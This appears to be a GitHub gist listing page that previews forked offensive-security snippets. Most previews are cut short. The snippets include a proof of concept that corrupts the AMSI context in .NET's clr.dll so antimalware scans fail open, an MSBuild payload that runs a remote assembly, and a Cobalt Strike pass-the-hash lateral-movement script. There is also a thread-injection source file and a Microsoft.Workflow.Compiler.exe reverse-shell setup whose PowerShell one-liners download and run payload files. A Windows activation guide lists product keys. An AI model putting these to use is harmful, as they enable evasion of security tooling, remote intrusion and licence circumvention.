Dave Hardy davehardy20
davehardy20
/ CorruptCLRGlobal.ps1
Created
December 7, 2018 14:29
— forked from mattifestation/CorruptCLRGlobal.ps1
A PoC function to corrupt the g_amsiContext global variable in clr.dll in .NET Framework Early Access build 3694
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Subvert-CLRAntiMalware { | |
| <# | |
| .SYNOPSIS | |
| A proof-of-concept demonstrating overwriting a global variable that stores a pointer to an antimalware scan interface context structure. This PoC was only built to work with .NET Framework Early Access build 3694. | |
| .DESCRIPTION | |
| clr.dll in .NET Framework Early Access build 3694 has a global variable that stores a pointer to an antimalware scan interface context structure. By reading the pointer at that offset and then overwriting the forst DWORD, the context structure will become corrupted and subsequent scanning calls will fail open. |
davehardy20
/ msBuildDemo.xml
Created
November 27, 2018 23:10
— forked from G0ldenGunSec/msBuildDemo.xml
MSBuild payload used to execute a remotely-hosted .net assembly
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <Target Name="DemoClass"> | |
| <ClassExample /> | |
| </Target> | |
| <UsingTask | |
| TaskName="ClassExample" | |
| TaskFactory="CodeTaskFactory" | |
| AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > | |
| <Task> | |
| <Code Type="Class" Language="cs"> |
davehardy20
/ EnableAMSILogging.ps1
Created
November 15, 2018 19:59
— forked from mattifestation/EnableAMSILogging.ps1
Enables AMSI logging to the AMSI/Operational event log
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Run this elevated, reboot, boom. | |
| # Feel free to name this whatever you want | |
| $AutoLoggerName = 'MyAMSILogger' | |
| $AutoLoggerGuid = "{$((New-Guid).Guid)}" | |
| New-AutologgerConfig -Name $AutoLoggerName -Guid $AutoLoggerGuid -Start Enabled | |
| Add-EtwTraceProvider -AutologgerName $AutoLoggerName -Guid '{2A576B87-09A7-520E-C21A-4942F0271D67}' -Level 0xff -MatchAnyKeyword 0x80000000000001 -Property 0x41 |
davehardy20
/ smbexec_psh.cna
Created
October 24, 2018 06:37
Cheap solution to problems with make_token, psexec/lateral movement/sekurlsa::pth for cross-domain PTH in the same forest.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Lateral Movement using Invoke-TheHash toolkit | |
| # Written by Mumbai | |
| # git clone https://github.com/Kevin-Robertson/Invoke-TheHash | |
| # mv Invoke-TheHash/Invoke-TheHash.ps1 Invoke-TheHash.ps1 | |
| # cat Invoke-TheHash/Invoke-*.ps1 >> Invoke-TheHash.ps1 | |
| beacon_command_register("smbexec_psh", "Lateral movement using Invoke-TheHash toolkit", | |
| "Synopsis: smbexec_psh [x86/x64] [target] [listener] [username] [domain] [ntlm]\n\n", | |
| "Run a payload on a target via Invoke-TheHash SMBExec"); |
davehardy20
/ windows10activation
Created
October 24, 2018 06:34
Activate Windows 10 without Any Activator
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1. Open CMD as Administrator | |
| 2. Paste the following commands into the Cmd: One by one, follow the order. | |
| cscript slmgr.vbs /ipk "SERIAL NUMBER HERE" | |
| Replace SERIAL NUMBER HER with any of these, according your Windows 10 installation type. | |
| Home/Core TX9XD-98N7V-6WMQ6-BX7FG-H8Q99 | |
| Home/Core (Country Specific) PVMJN-6DFY6-9CCP6-7BKTT-D3WVR | |
| Home/Core (Single Language) 7HNRX-D7KGG-3K4RQ-4WPJ4-YTDFH |
davehardy20
/ sedebug_rtlcreatethread.c
Created
October 24, 2018 06:33
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /*! @brief https://github.com/rapid7/meterpreter/blob/master/source/common/arch/win/remote_thread.c */ | |
| #include <windows.h> | |
| #include <stdio.h> | |
| typedef DWORD(WINAPI *prototype_RtlCreateUserThread)( | |
| HANDLE ProcessHandle, | |
| PSECURITY_DESCRIPTOR SecurityDescriptor, | |
| BOOL CreateSuspended, | |
| ULONG StackZeroBits, | |
| PULONG StackReserved, |
davehardy20
/ REV.txt
Created
October 22, 2018 21:29
Microsoft.Workflow.Compiler.exe Abuse for open a live C# Reverse Shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8"?> | |
| <CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler"> | |
| <files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays"> | |
| <d2p1:string>Rev.Shell</d2p1:string> | |
| </files> | |
| <parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler"> | |
| <assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> | |
| <compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> | |
| <coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName> | |
| <embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" /> |
davehardy20
/ Rev.Shell
Created
October 22, 2018 21:28
Abuse Microsoft.Workflow.Compiler.exe for compile C# Reverse Shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Text; | |
| using System.IO; | |
| using System.Diagnostics; | |
| using System.ComponentModel; | |
| using System.Net; | |
| using System.Net.Sockets; | |
| using System.Workflow.Activities; | |
| public class Program : SequentialWorkflowActivity |
davehardy20
/ PowerShell_Command.txt
Created
October 22, 2018 21:28
Reverse Shell Powershell command Abusing Microsoft.Workflow.Compiler.exe
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 64bit: | |
| powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell | |
| 32bit: | |
| powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsof |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Text; | |
| using System.IO; | |
| using System.Diagnostics; | |
| using System.ComponentModel; | |
| using System.Linq; | |
| using System.Net; | |
| using System.Net.Sockets; | |